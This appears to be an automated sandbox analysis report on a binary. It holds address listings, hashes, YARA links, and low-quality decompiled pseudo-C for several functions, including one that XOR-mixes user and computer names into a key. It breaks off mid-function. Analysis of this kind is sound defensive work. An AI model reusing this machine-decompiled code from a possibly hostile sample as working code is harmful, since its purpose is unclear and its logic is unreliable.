                                                                      0x00a2e771
                                                                      0x00a2e77b
                                                                      0x00a2e785
                                                                      0x00a2e78f
                                                                      0x00a2e799
                                                                      0x00a2e7a3
                                                                      0x00a2e7ad
                                                                      0x00a2e7b7
                                                                      0x00a2e7c1
                                                                      0x00a2e7cb
                                                                      0x00a2e7d5
                                                                      0x00a2e7df
                                                                      0x00a2e7e9
                                                                      0x00a2e7f3
                                                                      0x00a2e7fd
                                                                      0x00a2e807
                                                                      0x00a2e811
                                                                      0x00a2e81b
                                                                      0x00a2e825
                                                                      0x00a2e82f
                                                                      0x00a2e839
                                                                      0x00a2e843
                                                                      0x00a2e84d
                                                                      0x00a2e857
                                                                      0x00a2e861
                                                                      0x00a2e86b
                                                                      0x00a2e875
                                                                      0x00a2e87f
                                                                      0x00a2e889
                                                                      0x00a2e893
                                                                      0x00a2e89d
                                                                      0x00a2e8a7
                                                                      0x00a2e8b1
                                                                      0x00a2e8bb
                                                                      0x00a2e8c5
                                                                      0x00a2e8cf
                                                                      0x00a2e8d9
                                                                      0x00a2e8e3
                                                                      0x00a2e8ed
                                                                      0x00a2e8f7
                                                                      0x00a2e901
                                                                      0x00a2e90b
                                                                      0x00a2e915
                                                                      0x00a2e91f
                                                                      0x00a2e929
                                                                      0x00a2e933
                                                                      0x00a2e93d
                                                                      0x00a2e947
                                                                      0x00a2e951
                                                                      0x00a2e95b
                                                                      0x00a2e965
                                                                      0x00a2e968
                                                                      0x00a2e96c
                                                                      0x00a2e96e
                                                                      0x00a2e972
                                                                      0x00a2e97c
                                                                      0x00a2e986
                                                                      0x00a2e990
                                                                      0x00a2e99a
                                                                      0x00a2e9a4
                                                                      0x00a2e9ae
                                                                      0x00a2e9b8
                                                                      0x00a2e9c2
                                                                      0x00a2e9cc
                                                                      0x00a2e9d6
                                                                      0x00a2e9e0
                                                                      0x00a2e9ea
                                                                      0x00a2e9f4
                                                                      0x00a2e9fe
                                                                      0x00a2ea08
                                                                      0x00a2ea12
                                                                      0x00a2ea1c
                                                                      0x00a2ea23
                                                                      0x00a2ea2a
                                                                      0x00a2ea31
                                                                      0x00a2ea38
                                                                      0x00a2ea3f
                                                                      0x00a2ea46
                                                                      0x00a2ea4d
                                                                      0x00a2ea54
                                                                      0x00a2ea5b
                                                                      0x00a2ea62
                                                                      0x00a2ea69
                                                                      0x00a2ec57
                                                                      0x00a2ec5a
                                                                      0x00a2ec60
                                                                      0x00a2ec63
                                                                      0x00a2ec76
                                                                      0x00a2ec6f
                                                                      0x00a2ec6f
                                                                      0x00000000
                                                                      0x00a2ec6f
                                                                      0x00a2ec63
                                                                      0x00a2ea70
                                                                      0x00a2ea7f
                                                                      0x00a2ea82
                                                                      0x00a2ea86
                                                                      0x00a2ea89
                                                                      0x00a2ec06
                                                                      0x00a2ec0a
                                                                      0x00a2ec44
                                                                      0x00a2ec47
                                                                      0x00a2ec10
                                                                      0x00a2ec13
                                                                      0x00a2ec18
                                                                      0x00a2ec1c
                                                                      0x00a2ec21
                                                                      0x00a2ec28
                                                                      0x00a2ec28
                                                                      0x00a2ec21
                                                                      0x00a2ec2a
                                                                      0x00a2ec2a
                                                                      0x00a2ec48
                                                                      0x00a2ec49
                                                                      0x00a2ec49
                                                                      0x00a2ec50
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a2ec50
                                                                      0x00a2ea8f
                                                                      0x00a2ea92
                                                                      0x00a2ea95
                                                                      0x00a2ea95
                                                                      0x00a2ea99
                                                                      0x00a2ea9e
                                                                      0x00a2ea9f
                                                                      0x00a2eaa3
                                                                      0x00a2eaa6
                                                                      0x00a2eaa9
                                                                      0x00a2eaae
                                                                      0x00a2eab3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a2eab5
                                                                      0x00a2eab9
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a2eabb
                                                                      0x00a2eac3
                                                                      0x00a2ebce
                                                                      0x00a2ebce
                                                                      0x00a2ebd2
                                                                      0x00a2ebd5
                                                                      0x00a2ebdc
                                                                      0x00a2ebdd
                                                                      0x00a2ebe0
                                                                      0x00a2ebe5
                                                                      0x00a2ebe7
                                                                      0x00a2ebe8
                                                                      0x00a2ebeb
                                                                      0x00a2ebee
                                                                      0x00a2ebf3
                                                                      0x00a2ebf8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a2ebfa
                                                                      0x00a2ec01
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a2ec03
                                                                      0x00000000
                                                                      0x00a2ec03
                                                                      0x00a2ec37
                                                                      0x00a2ec3a
                                                                      0x00a2ec3b
                                                                      0x00000000
                                                                      0x00a2ec3b
                                                                      0x00a2eac9
                                                                      0x00a2eac9
                                                                      0x00a2eacd
                                                                      0x00a2ead2
                                                                      0x00a2eb83
                                                                      0x00a2eb83
                                                                      0x00a2eb87
                                                                      0x00a2eb89
                                                                      0x00a2eb98
                                                                      0x00a2eb98
                                                                      0x00a2eb9c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a2eb8f
                                                                      0x00a2eba1
                                                                      0x00a2eba3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a2eba5
                                                                      0x00a2eba6
                                                                      0x00a2ebaa
                                                                      0x00a2ebab
                                                                      0x00a2ebb4
                                                                      0x00a2ebb9
                                                                      0x00a2ebc1
                                                                      0x00a2ebc4
                                                                      0x00a2ebc7
                                                                      0x00a2ebc8
                                                                      0x00000000
                                                                      0x00a2ebc8
                                                                      0x00a2eb91
                                                                      0x00a2eb95
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a2eb97
                                                                      0x00a2eb97
                                                                      0x00a2eb9e
                                                                      0x00000000
                                                                      0x00a2eae1
                                                                      0x00a2eae1
                                                                      0x00a2eae3
                                                                      0x00a2eb09
                                                                      0x00a2eb09
                                                                      0x00a2eb0d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a2eb00
                                                                      0x00a2eb7e
                                                                      0x00a2eb13
                                                                      0x00a2eb17
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a2eb25
                                                                      0x00a2eb2d
                                                                      0x00a2eb32
                                                                      0x00a2eb36
                                                                      0x00a2eb3b
                                                                      0x00a2eb46
                                                                      0x00a2eb55
                                                                      0x00a2eb5d
                                                                      0x00a2eb5e
                                                                      0x00a2eb62
                                                                      0x00a2eb6e
                                                                      0x00a2eb74
                                                                      0x00a2eb75
                                                                      0x00000000
                                                                      0x00a2eb75
                                                                      0x00a2eb02
                                                                      0x00a2eb06
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a2eb08
                                                                      0x00a2eb08
                                                                      0x00a2eb0f
                                                                      0x00000000
                                                                      0x00a2eb0f
                                                                      0x00a2ead2
                                                                      0x00a2eaee
                                                                      0x00a2eaf4
                                                                      0x00a2eaf5
                                                                      0x00000000
                                                                      0x00a2eaf5
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.320662138.00000000009C2000.00000002.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000005.00000002.320628061.00000000009C0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000005.00000002.320869373.0000000000A42000.00000002.00020000.sdmp Download File
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @A$ AA$ BA$(@A$(AA$(BA$0@A$0AA$0BA$8@A$8AA$8BA$@@A$@AA$@BA$H@A$HAA$HBA$P@A$PAA$PBA$X@A$XAA$XBA$`@A$`AA$`BA$h?A$h@A$hAA$hBA$p?A$p@A$pAA$pBA$t?A$x?A$x@A$xAA$xBA$?A$?A$@A$@A$AA$AA
                                                                      • API String ID: 0-2473593039
                                                                      • Opcode ID: 7a86c8557865365371fd70ba80b9ec5cf29cee4bf688fcc2242cc569f7caec83
                                                                      • Instruction ID: 476562b125bdbaf388b0e73eedcde7d5e76cc374054c9ca178fa8d25df30853d
                                                                      • Opcode Fuzzy Hash: 7a86c8557865365371fd70ba80b9ec5cf29cee4bf688fcc2242cc569f7caec83
                                                                      • Instruction Fuzzy Hash: F2F149B0800269DEDB21CF95D9487DEBFB0AB96308F5081DAD5593B241C3B90BC9CF98
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00A21478, Relevance: 10.1, Strings: 8, Instructions: 127COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 21%
                                                                      			E00A21478(void* __ecx, void* __fp0) {
				void* __esi;
				void* _t57;
				void* _t58;
				void* _t65;
				void* _t68;
				void* _t71;
				void* _t84;
				signed int _t87;
				void* _t89;
				signed int _t93;
				intOrPtr _t97;
				intOrPtr _t98;
				void* _t100;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t111;

				_t111 = __fp0;
				_t89 = __ecx;
				_t100 = _t102 - 0x6c;
				_t103 = _t102 - 0x474;
				 *((intOrPtr*)(_t100 + 0x4c)) = 0x4125f8;
				 *((intOrPtr*)(_t100 + 0x50)) = 0x412608;
				 *((intOrPtr*)(_t100 + 0x54)) = 0x412618;
				 *((intOrPtr*)(_t100 + 0x58)) = 0x41262c;
				 *((intOrPtr*)(_t100 + 0x1c)) = 0x41263c;
				 *((intOrPtr*)(_t100 + 0x20)) = 0x412648;
				 *((intOrPtr*)(_t100 + 0x24)) = 0x412654;
				 *((intOrPtr*)(_t100 + 0x28)) = 0x412664;
				 *((intOrPtr*)(_t100 + 0x3c)) = 0x412670;
				 *((intOrPtr*)(_t100 + 0x40)) = 0x412680;
				 *((intOrPtr*)(_t100 + 0x44)) = 0x412690;
				 *((intOrPtr*)(_t100 + 0x48)) = 0x4126a4;
				 *((intOrPtr*)(_t100 + 0x2c)) = 0x4126b4;
				 *((intOrPtr*)(_t100 + 0x30)) = 0x4126c0;
				 *((intOrPtr*)(_t100 + 0x34)) = 0x4126cc;
				 *((intOrPtr*)(_t100 + 0x38)) = 0x4126dc;
				 *((intOrPtr*)(_t100 + 0x5c)) = 0x4126e8;
				 *((intOrPtr*)(_t100 + 0x60)) = 0x412700;
				 *((intOrPtr*)(_t100 + 0x64)) = 0x412718;
				 *((intOrPtr*)(_t100 + 0x68)) = 0x412734;
				_t87 = 0;
				do {
					_push(0x7f);
					_push(0);
					_push(_t100 - 0x63);
					 *((char*)(_t100 - 0x64)) = 0;
					L00A303F4();
					_push(_t100 - 0x64);
					_t93 = _t87 << 2;
					_push( *((intOrPtr*)(_t100 + _t93 + 0x4c)));
					_push( *((intOrPtr*)(_t100 + 0x78)));
					_t57 = 0x7f;
					_t58 = E00A2D9F2(_t57, _t89);
					_t103 = _t103 + 0x18;
					if(_t58 == 0) {
						E00A2104A(_t100 - 0x408);
						_push(_t100 - 0x64);
						_push(_t100 - 0x1f4);
						L00A303FA();
						_t97 =  *((intOrPtr*)(_t100 + 0x78));
						 *((intOrPtr*)(_t100 - 0x37c)) =  *((intOrPtr*)(_t100 + 0x7c));
						_t34 = _t87 + 1; // 0x1
						 *((intOrPtr*)(_t100 - 0x1f8)) = _t34;
						_push(_t100 - 0x2f8);
						_push( *((intOrPtr*)(_t100 + _t93 + 0x1c)));
						_push(_t97);
						_t65 = 0x7f;
						E00A2D9F2(_t65, _t89);
						_push(_t100 - 0x3fc);
						_push(0x41274c);
						_push(_t97);
						_t68 = 0x7f;
						E00A2D9F2(_t68, _t89);
						_push(_t100 - 0x378);
						_push(0x412760);
						_push(_t97);
						_t71 = 0x7f;
						E00A2D9F2(_t71, _t89);
						_t105 = _t103 + 0x2c;
						if(_t87 != 3) {
							_push(_t100 - 0x278);
							_push(0x412664);
							_push(_t97);
							_t84 = 0x7f;
							E00A2D9F2(_t84, _t89);
							_t105 = _t105 + 0xc;
						}
						E00A2D9CB(_t89, _t97,  *((intOrPtr*)(_t100 + _t93 + 0x2c)), _t100 - 0x74);
						E00A2D9CB(_t89, _t97,  *((intOrPtr*)(_t100 + _t93 + 0x5c)), _t100 - 0x70);
						_t103 = _t105 + 0x18;
						_t98 =  *((intOrPtr*)(_t100 + 0x74));
						E00A212DE(_t98, _t89, _t97,  *((intOrPtr*)(_t100 + _t93 + 0x3c)), _t100 - 0x174, 0);
						_push(_t98 + 0xa9c);
						_push(_t100 - 0xf4);
						L00A303FA();
						_pop(_t89);
						_t58 = E00A21279(_t100 - 0x408, _t111, _t98);
					}
					_t87 = _t87 + 1;
				} while (_t87 < 4);
				return _t58;
			}




















                                                                      0x00a21478
                                                                      0x00a21478
                                                                      0x00a21479
                                                                      0x00a2147d
                                                                      0x00a21486
                                                                      0x00a2148d
                                                                      0x00a21494
                                                                      0x00a2149b
                                                                      0x00a214a2
                                                                      0x00a214a9
                                                                      0x00a214b0
                                                                      0x00a214b7
                                                                      0x00a214be
                                                                      0x00a214c5
                                                                      0x00a214cc
                                                                      0x00a214d3
                                                                      0x00a214da
                                                                      0x00a214e1
                                                                      0x00a214e8
                                                                      0x00a214ef
                                                                      0x00a214f6
                                                                      0x00a214fd
                                                                      0x00a21504
                                                                      0x00a2150b
                                                                      0x00a21512
                                                                      0x00a21514
                                                                      0x00a21514
                                                                      0x00a21519
                                                                      0x00a2151b
                                                                      0x00a2151c
                                                                      0x00a21520
                                                                      0x00a21528
                                                                      0x00a2152b
                                                                      0x00a2152e
                                                                      0x00a21532
                                                                      0x00a21537
                                                                      0x00a21538
                                                                      0x00a2153d
                                                                      0x00a21542
                                                                      0x00a2154e
                                                                      0x00a21556
                                                                      0x00a2155d
                                                                      0x00a2155e
                                                                      0x00a21566
                                                                      0x00a21569
                                                                      0x00a2156f
                                                                      0x00a21572
                                                                      0x00a2157e
                                                                      0x00a2157f
                                                                      0x00a21583
                                                                      0x00a21586
                                                                      0x00a21587
                                                                      0x00a21592
                                                                      0x00a21593
                                                                      0x00a21598
                                                                      0x00a2159b
                                                                      0x00a2159c
                                                                      0x00a215a7
                                                                      0x00a215a8
                                                                      0x00a215ad
                                                                      0x00a215b0
                                                                      0x00a215b1
                                                                      0x00a215b6
                                                                      0x00a215bc
                                                                      0x00a215c4
                                                                      0x00a215c5
                                                                      0x00a215ca
                                                                      0x00a215cd
                                                                      0x00a215ce
                                                                      0x00a215d3
                                                                      0x00a215d3
                                                                      0x00a215df
                                                                      0x00a215ed
                                                                      0x00a215f2
                                                                      0x00a21603
                                                                      0x00a21608
                                                                      0x00a21613
                                                                      0x00a2161a
                                                                      0x00a2161b
                                                                      0x00a21621
                                                                      0x00a21629
                                                                      0x00a21629
                                                                      0x00a2162e
                                                                      0x00a2162f
                                                                      0x00a2163f

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.320662138.00000000009C2000.00000002.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000005.00000002.320628061.00000000009C0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000005.00000002.320869373.0000000000A42000.00000002.00020000.sdmp Download File
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ,&A$4'A$<&A$H&A$T&A$d&A$p&A$&A
                                                                      • API String ID: 0-3237638986
                                                                      • Opcode ID: 88ed99f36386e7362777411d84ae5ff3a990d4990d307b203149d78fed32b556
                                                                      • Instruction ID: de2ef75429b9d25e5ab621e8c991456a735ddaab97b2e64fa32712dee2dd5dba
                                                                      • Opcode Fuzzy Hash: 88ed99f36386e7362777411d84ae5ff3a990d4990d307b203149d78fed32b556
                                                                      • Instruction Fuzzy Hash: 0A4184B190021CAFDF20DF94DE45ADE3BA8EF14304F104566F918D7191D7B89A94CF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00A260BE, Relevance: 8.9, Strings: 7, Instructions: 143COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 45%
                                                                      			E00A260BE(signed int _a4) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v291;
				char _v292;
				char _v547;
				char _v548;
				char _v1058;
				char _v1060;
				char _v1570;
				char _v1572;
				char* _t81;
				char* _t82;
				signed int _t84;
				signed int _t85;
				signed int _t87;
				signed int _t89;
				signed int _t92;
				signed int _t97;
				intOrPtr* _t102;
				signed short* _t103;
				intOrPtr _t106;
				void* _t107;

				_t85 = 0;
				_v20 = 0xa3;
				_v19 = 0x1e;
				_v18 = 0xf3;
				_v17 = 0x69;
				_v16 = 7;
				_v15 = 0x62;
				_v14 = 0xd9;
				_v13 = 0x1f;
				_v12 = 0x1e;
				_v11 = 0xe9;
				_v10 = 0x35;
				_v9 = 0x7d;
				_v8 = 0x4f;
				_v7 = 0xd2;
				_v6 = 0x7d;
				_v5 = 0x48;
				_v292 = 0;
				L00A303F4();
				_v548 = 0;
				L00A303F4();
				_v1572 = 0;
				L00A303F4();
				_v1060 = 0;
				L00A303F4();
				_v36 = _a4 + 4;
				_a4 = 0;
				_v24 = 0xff;
				 *0x412090( &_v292,  &_v24,  &_v1058, 0, 0x1fe,  &_v1570, 0, 0x1fe,  &_v547, 0, 0xff,  &_v291, 0, 0xff);
				_v24 = 0xff;
				 *0x412018( &_v548,  &_v24);
				_t102 =  *0x4120d0;
				 *_t102(0, 0,  &_v292, 0xffffffff,  &_v1572, 0xff);
				 *_t102(0, 0,  &_v548, 0xffffffff,  &_v1060, 0xff);
				_t81 =  &_v292;
				_push(_t81);
				L00A303B6();
				_v32 = _t81;
				_t82 =  &_v548;
				_push(_t82);
				L00A303B6();
				_t106 = _v36;
				_v28 = _t82;
				_push(0x10);
				_push( &_v20);
				_push(_t106);
				L00A3043C();
				_t84 = 0xba0da71d;
				if(_v28 > 0) {
					_t103 =  &_v1060;
					do {
						_t97 = _a4 & 0x80000003;
						if(_t97 < 0) {
							_t97 = (_t97 - 0x00000001 | 0xfffffffc) + 1;
						}
						_t89 = ( *_t103 & 0x0000ffff) * _t84;
						_t84 = _t84 * 0xbc8f;
						 *(_t106 + _t97 * 4) =  *(_t106 + _t97 * 4) ^ _t89;
						_a4 = _a4 + 1;
						_t103 =  &(_t103[1]);
					} while (_a4 < _v28);
				}
				if(_v32 > _t85) {
					do {
						_t92 = _a4 & 0x80000003;
						if(_t92 < 0) {
							_t92 = (_t92 - 0x00000001 | 0xfffffffc) + 1;
						}
						_t87 = ( *(_t107 + _t85 * 2 - 0x620) & 0x0000ffff) * _t84;
						_t84 = _t84 * 0xbc8f;
						 *(_t106 + _t92 * 4) =  *(_t106 + _t92 * 4) ^ _t87;
						_a4 = _a4 + 1;
						_t85 = _t85 + 1;
					} while (_t85 < _v32);
				}
				return _t84;
			}











































                                                                      0x00a260cf
                                                                      0x00a260da
                                                                      0x00a260de
                                                                      0x00a260e2
                                                                      0x00a260e6
                                                                      0x00a260ea
                                                                      0x00a260ee
                                                                      0x00a260f2
                                                                      0x00a260f6
                                                                      0x00a260fa
                                                                      0x00a260fe
                                                                      0x00a26102
                                                                      0x00a26106
                                                                      0x00a2610a
                                                                      0x00a2610e
                                                                      0x00a26112
                                                                      0x00a26116
                                                                      0x00a2611a
                                                                      0x00a26120
                                                                      0x00a2612e
                                                                      0x00a26134
                                                                      0x00a26147
                                                                      0x00a2614e
                                                                      0x00a2615c
                                                                      0x00a26163
                                                                      0x00a2616e
                                                                      0x00a2617f
                                                                      0x00a26182
                                                                      0x00a26185
                                                                      0x00a26196
                                                                      0x00a26199
                                                                      0x00a2619f
                                                                      0x00a261b8
                                                                      0x00a261cd
                                                                      0x00a261cf
                                                                      0x00a261d5
                                                                      0x00a261d6
                                                                      0x00a261db
                                                                      0x00a261de
                                                                      0x00a261e4
                                                                      0x00a261e5
                                                                      0x00a261ea
                                                                      0x00a261ed
                                                                      0x00a261f0
                                                                      0x00a261f5
                                                                      0x00a261f6
                                                                      0x00a261f7
                                                                      0x00a26202
                                                                      0x00a26207
                                                                      0x00a26209
                                                                      0x00a2620f
                                                                      0x00a26212
                                                                      0x00a26218
                                                                      0x00a2621e
                                                                      0x00a2621e
                                                                      0x00a26222
                                                                      0x00a26225
                                                                      0x00a2622e
                                                                      0x00a26230
                                                                      0x00a26237
                                                                      0x00a26238
                                                                      0x00a2620f
                                                                      0x00a26240
                                                                      0x00a26242
                                                                      0x00a26245
                                                                      0x00a2624b
                                                                      0x00a26251
                                                                      0x00a26251
                                                                      0x00a2625a
                                                                      0x00a2625d
                                                                      0x00a26266
                                                                      0x00a26268
                                                                      0x00a2626b
                                                                      0x00a2626c
                                                                      0x00a26242
                                                                      0x00a26275

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.320662138.00000000009C2000.00000002.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000005.00000002.320628061.00000000009C0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000005.00000002.320869373.0000000000A42000.00000002.00020000.sdmp Download File
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 5$H$O$b$i$}$}
                                                                      • API String ID: 0-3760989150
                                                                      • Opcode ID: 43b2ec5c8048ec64a89d0eaefec6abc2179865d68597a24ed28c74e05bf594a1
                                                                      • Instruction ID: 9744b08bd9d50a5650b96e240a44797ca118f59f01bb2781674a8e0cd528414e
                                                                      • Opcode Fuzzy Hash: 43b2ec5c8048ec64a89d0eaefec6abc2179865d68597a24ed28c74e05bf594a1
                                                                      • Instruction Fuzzy Hash: 3151B671C0425DEEDB11CBA8CC81EEEBBBCEF49314F0442A9E555A6192D3349B85CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00A21642, Relevance: 8.9, Strings: 7, Instructions: 118COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 83%
                                                                      			E00A21642(void* __fp0) {
				void* __esi;
				void* _t65;
				signed int _t89;
				void* _t92;
				intOrPtr _t106;
				void* _t108;
				void* _t110;
				void* _t111;
				void* _t118;

				_t118 = __fp0;
				_t108 = _t110 - 0x70;
				_t111 = _t110 - 0x474;
				 *((intOrPtr*)(_t108 + 0x40)) = 0x412774;
				 *((intOrPtr*)(_t108 + 0x44)) = 0x412784;
				 *((intOrPtr*)(_t108 + 0x48)) = 0x412794;
				 *((intOrPtr*)(_t108 + 0x4c)) = 0x4127a4;
				 *((intOrPtr*)(_t108 + 0x50)) = 0x4127b4;
				 *((intOrPtr*)(_t108 + 0x54)) = 0x4127c0;
				 *((intOrPtr*)(_t108 + 0x58)) = 0x4127cc;
				 *((intOrPtr*)(_t108 + 0x5c)) = 0x4127d8;
				 *((intOrPtr*)(_t108 + 0x20)) = 0x41263c;
				 *((intOrPtr*)(_t108 + 0x24)) = 0x412648;
				 *((intOrPtr*)(_t108 + 0x28)) = 0x4127e4;
				 *((intOrPtr*)(_t108 + 0x2c)) = 0x412664;
				 *((intOrPtr*)(_t108 + 0x30)) = 0x4126b4;
				 *((intOrPtr*)(_t108 + 0x34)) = 0x4126c0;
				 *((intOrPtr*)(_t108 + 0x38)) = 0x4127f4;
				 *((intOrPtr*)(_t108 + 0x3c)) = 0x4126dc;
				 *((intOrPtr*)(_t108 + 0x60)) = 0x412800;
				 *((intOrPtr*)(_t108 + 0x64)) = 0x412810;
				 *((intOrPtr*)(_t108 + 0x68)) = 0x412820;
				 *((intOrPtr*)(_t108 + 0x6c)) = 0x412834;
				_t89 = 0;
				do {
					_push(0x7f);
					_push(0);
					_push(_t108 - 0x5f);
					 *((char*)(_t108 - 0x60)) = 0;
					L00A303F4();
					_t111 = _t111 + 0xc;
					_t97 = _t89 << 2;
					_t65 = E00A21819(_t108 - 0x60,  *((intOrPtr*)(_t108 + 0x7c)),  *((intOrPtr*)(_t108 + (_t89 << 2) + 0x50)));
					if(_t65 != 0) {
						E00A2104A(_t108 - 0x404);
						_push(_t108 - 0x60);
						_push(_t108 - 0x1f0);
						L00A303FA();
						_pop(_t92);
						 *((intOrPtr*)(_t108 - 0x378)) =  *((intOrPtr*)( *((intOrPtr*)(_t108 + 0x78)) + 0xb1c));
						_t37 = _t89 + 1; // 0x1
						 *((intOrPtr*)(_t108 - 0x1f4)) = _t37;
						E00A21819(_t108 - 0x2f4,  *((intOrPtr*)(_t108 + 0x7c)),  *((intOrPtr*)(_t108 + _t97 + 0x20)));
						E00A21819(_t108 - 0x3f8,  *((intOrPtr*)(_t108 + 0x7c)), 0x412844);
						E00A21819(_t108 - 0x374,  *((intOrPtr*)(_t108 + 0x7c)), 0x412854);
						if(_t89 != 3) {
							E00A21819(_t108 - 0x274,  *((intOrPtr*)(_t108 + 0x7c)), 0x412664);
							E00A2D9CB(_t92,  *((intOrPtr*)(_t108 + 0x7c)), 0x4126dc, _t108 - 0x68);
							_t111 = _t111 + 0xc;
						}
						E00A2D9CB(_t92,  *((intOrPtr*)(_t108 + 0x7c)),  *((intOrPtr*)(_t108 + _t97 + 0x30)), _t108 - 0x70);
						E00A2D9CB(_t92,  *((intOrPtr*)(_t108 + 0x7c)),  *((intOrPtr*)(_t108 + _t97 + 0x60)), _t108 - 0x6c);
						_t106 =  *((intOrPtr*)(_t108 + 0x78));
						_t111 = _t111 + 0x18;
						E00A212DE(_t106, _t92,  *((intOrPtr*)(_t108 + 0x7c)),  *((intOrPtr*)(_t108 + _t97 + 0x40)), _t108 - 0x170, 1);
						_push(_t106 + 0xa9c);
						_push(_t108 - 0xf0);
						L00A303FA();
						_t65 = E00A21279(_t108 - 0x404, _t118, _t106);
					}
					_t89 = _t89 + 1;
				} while (_t89 < 4);
				return _t65;
			}












                                                                      0x00a21642
                                                                      0x00a21643
                                                                      0x00a21647
                                                                      0x00a21650
                                                                      0x00a21657
                                                                      0x00a2165e
                                                                      0x00a21665
                                                                      0x00a2166c
                                                                      0x00a21673
                                                                      0x00a2167a
                                                                      0x00a21681
                                                                      0x00a21688
                                                                      0x00a2168f
                                                                      0x00a21696
                                                                      0x00a2169d
                                                                      0x00a216a4
                                                                      0x00a216ab
                                                                      0x00a216b2
                                                                      0x00a216b9
                                                                      0x00a216c0
                                                                      0x00a216c7
                                                                      0x00a216ce
                                                                      0x00a216d5
                                                                      0x00a216dc
                                                                      0x00a216de
                                                                      0x00a216de
                                                                      0x00a216e3
                                                                      0x00a216e5
                                                                      0x00a216e6
                                                                      0x00a216ea
                                                                      0x00a216ef
                                                                      0x00a216f4
                                                                      0x00a21701
                                                                      0x00a21708
                                                                      0x00a21714
                                                                      0x00a2171c
                                                                      0x00a21723
                                                                      0x00a21724
                                                                      0x00a21733
                                                                      0x00a21738
                                                                      0x00a21741
                                                                      0x00a2174a
                                                                      0x00a21750
                                                                      0x00a21763
                                                                      0x00a21776
                                                                      0x00a2177e
                                                                      0x00a2178e
                                                                      0x00a2179f
                                                                      0x00a217a4
                                                                      0x00a217a4
                                                                      0x00a217b2
                                                                      0x00a217c2
                                                                      0x00a217c7
                                                                      0x00a217ca
                                                                      0x00a217df
                                                                      0x00a217ea
                                                                      0x00a217f1
                                                                      0x00a217f2
                                                                      0x00a21800
                                                                      0x00a21800
                                                                      0x00a21805
                                                                      0x00a21806
                                                                      0x00a21816

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.320662138.00000000009C2000.00000002.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000005.00000002.320628061.00000000009C0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000005.00000002.320869373.0000000000A42000.00000002.00020000.sdmp Download File
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (A$4(A$<&A$H&A$d&A$t'A$'A
                                                                      • API String ID: 0-2857912252
                                                                      • Opcode ID: 1dd3c48cf87e824894ac796b353b11c003e09e2c1ffeee2d2140970bcd4911b6
                                                                      • Instruction ID: b212b6850cda3b7767e073777c64630710d0f5ee35b221875f596eb6023833ef
                                                                      • Opcode Fuzzy Hash: 1dd3c48cf87e824894ac796b353b11c003e09e2c1ffeee2d2140970bcd4911b6
                                                                      • Instruction Fuzzy Hash: 2A514BB190025D9FDF24DF64DE859DD3BB8FF04308F10806AF928A6152D3B599A9CF98
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00A22E88, Relevance: 6.3, Strings: 5, Instructions: 69COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00A22E88(intOrPtr* __edi, void* __eflags) {
				void* __esi;
				intOrPtr* _t49;
				intOrPtr* _t50;
				intOrPtr* _t51;
				intOrPtr* _t53;
				intOrPtr* _t54;
				intOrPtr* _t59;

				_t60 = __edi;
				E00A27340(__edi, __eflags);
				 *((intOrPtr*)(__edi + 0x1d8)) = 0;
				 *((intOrPtr*)(__edi + 0x1cc)) = 0;
				 *((intOrPtr*)(__edi + 0x1d0)) = 0;
				 *((intOrPtr*)(__edi + 0x1d4)) = 0;
				_t5 = _t60 + 0x1e0; // 0x1e0
				_t49 = _t5;
				 *((intOrPtr*)(__edi + 0x1dc)) = 0x100;
				 *_t49 = 0x413754;
				 *((intOrPtr*)(_t49 + 0x10)) = 0;
				 *((intOrPtr*)(_t49 + 4)) = 0;
				 *((intOrPtr*)(_t49 + 8)) = 0;
				 *((intOrPtr*)(_t49 + 0x14)) = 0x100;
				 *((intOrPtr*)(_t49 + 0xc)) = 0;
				 *_t49 = 0x413760;
				 *((intOrPtr*)(__edi + 0x1c8)) = 0x413758;
				_t13 = _t60 + 0x1f8; // 0x1f8
				_t50 = _t13;
				 *((intOrPtr*)(_t50 + 4)) = 0;
				 *((intOrPtr*)(_t50 + 8)) = 0;
